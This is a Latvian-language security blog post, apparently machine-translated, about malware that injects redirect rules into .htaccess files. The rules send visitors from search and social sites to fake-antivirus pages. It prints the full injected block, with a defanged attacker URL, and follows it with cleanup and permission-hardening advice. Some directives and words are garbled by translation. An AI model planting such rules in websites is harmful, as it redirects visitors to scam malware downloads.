Ļaunprātīga programmatūra/vīruss – .htaccess "rewrite" & novirzīt
Jauna vīrusa forma par ko es redzu, ka nav daudz zināms, tas ietekmē vietnes, kas mitinātas vietnē neuzticami serveri kur var lietot lietotāju konti/apakšdomēnu konti “skat” starp tām. Precīzāk, visi hostinga konti tiek ievietoti mapē “vhosts“un autortiesības uz lietotāja mape No “vhosts” tas tiek piešķirts vispārējam lietotājam… tālākpārdevējs vairumā gadījumu. Tā ir tipiska tīmekļa serveru metode, kas netiek izmantota WHM/cPanelApvidū
apmierināts
.htaccess vīrusa darbība – .htaccess Hack
vīruss ietekmēt failus .htaccess no upura vietas. Rindas tiek pievienotas / direktīva uz kuru novirzīt apmeklētājus (no yahoo, msn, google, facebook, yaindex, twitter, myspace u.c. vietnēm un portāliem ar lielu trafiku) uz dažām vietnēm, kas piedāvā “pretvīrusu risinājumi“. Runa ir par viltoti pretvīrusu risinājumi, par kuru ievadā rakstīju no Viltus pretvīrusu noņemšanas līdzeklisApvidū
Lūk, kā viens izskatās .htaccess ietekmēts: (nepiekļūstiet vietrāžiem URL tālāk norādīto rindiņu saturā)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3RewriteEngine ieslēgts
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$[NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tiešraide.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dubultklikšķis.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tiešraides žurnāls.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*uzbudināt.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*viss tīmeklis.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=r [R,L]RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=4 [R,L]
Tie, kas izmanto WordPress, atradīs šīs rindiņas failā .htaccess No public_html. Turklāt vīruss mapē izveido identisku .htaccess wp-satursApvidū
*Ir arī situācijas, kad peoriavascularsurgery.com vietā parādās dns.thesoulfoodcafe.com vai citas adreses.
Ko dara šis vīruss?
Pēc novirzīšanas apmeklētāju ar atplestām rokām sagaida ziņojums:
Brīdinājums!
Jūsu datorā ir dažādas vīrusu un ļaunprātīgas programmatūras klātbūtnes pazīmes. Jūsu sistēmai nepieciešama tūlītēja pretvīrusu pārbaude!
Sistēmas drošība veiks ātru un bezmaksas datora skenēšanu pret vīrusiem un ļaunprātīgām programmām.

Neatkarīgi no tā, kuru pogu mēs nospiežam, mēs tiekam novirzīti uz lapu “Mans dators“, radīts, lai atdarinātu XP dizains. Šeit tas sākas automātiski “skenēšanas process”, kura beigās mēs atklājam, ka “mēs esam inficēti”Apvidū

Pēc OK vai Cancel nospiešanas tas sāksies lejupielādētno faila setup.exe. Šis setup.exe ir viltots pretvīruss kas ietekmē sistēmu. Tas instalēs virkni ļaunprātīgas programmatūras lietojumprogrammu, kas tālāk izplatīs inficētās saites, un papildus šīm a programmatūras antivīruss (arī viltotu), ko upuris aicināts iegādāties.
Tie, kuri jau ir sazinājušies ar šo vīrusa formu, var to izmantot Viltus pretvīrusu noņemšanas līdzeklis. Ieteicams arī skenēt visu HDD. ieteikt Kaspersky interneta drošība vai Kaspersky Anti VirusApvidū
Šī vīrusa forma ietekmē apmeklētāju operētājsistēmas ar operētājsistēmām Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 un Windows 95. Līdz šim nav zināmi Windows Vista un Windows 7 operētājsistēmu inficēšanās gadījumi.
Kā mēs varam noņemt šo .htaccess vīrusu no servera un kā mēs varam novērst inficēšanos.
1. Failu analīze un aizdomīgu kodu dzēšana. Lai pārliecinātos, ka tiek ietekmēts ne tikai fails .htaccess tas ir labi mēs analizējam visus failus .php un .jsApvidū
2. Pārrakstām .htaccess failu un iestatām to chmod 644 vai 744 tikai ar rakstīšanas tiesībām lietotājs-ul īpašnieksApvidū
3. Veidojot hostinga kontu vietnei, mapē /mājas vai /webroot automātiski tiks izveidota mape, kurai parasti ir lietotāja vārds (cpanel, ftp lietotājsutt.). Lai novērstu datu rakstīšanu un vīrusu pārnešanu no viena lietotāja uz otru, ieteicams katrā lietotāja mapē iestatīt:
chmod 644 vai 744, 755 – norādīts 644.
chown -R numura_lietotāja numura_mape.
chgrp -R nume_user nume_folder
ls - viss lai pārbaudītu, vai režīmi ir iestatīti pareizi. Ir jāparādās kaut kam šādam:
drwx–x–x 12 dinamics dinamics 4096 6. maijs 14:51 dinamics/
drwx–x–x 10 Duran Duran 4096 7. marts 07:46 duran/
drwx–x–x 12 mēģenes mēģenes 4096 29. janvāris 11:23 mēģenes/
drwxr-xr-x 14 express express 4096, 2009. gada 26. februāris, ekspress/
drwxr-xr-x 9 tie tie 4096 19. maijs 01:09 tie/
drwx–x–x 9 ferma saimniecība 4096 19. decembris 22:29 ferma/
Ja kādam no iepriekšminētajiem lietotājiem būs FTP vīrusa faili, tas nevarēs nosūtīt vīrusu citam mitinātam lietotājam. Tas ir minimālais drošības pasākums, lai aizsargātu tīmekļa serverī mitinātos kontus.
Kopējie domēnu elementi, kurus ietekmē šāda veida vīrusi.
Visi ietekmētie domēni novirza apmeklētājus uz vietnēm, kurās ir ietverts domēna nosaukums “/main.php?e=4&h“Apvidū
Šis “vīruss de .htaccess” ietekmē jebkura veida CMS (Joomla, WordPress, phpBBuc), kas izmanto .htaccessApvidū
.htaccess Virus Hack & NovirzītApvidū
Ļaunprātīga programmatūra/vīruss – .htaccess "rewrite" & novirzīt
Kas jauns
Pret Stealth L.P.
Dibinātājs un redaktors Stealth Settings, din 2006 pana in prezent. Experienta pe sistemele de operare Linux (in special CentOS), Mac OS X , Windows XP > Windows 10 Si WordPress (CMS).
Skatīt visas Stealth L.P. ziņas.Iespējams, jūs interesē arī...
3 domas par “Ļaunprātīga programmatūra/vīruss – .htaccess "rewrite" & novirzīt”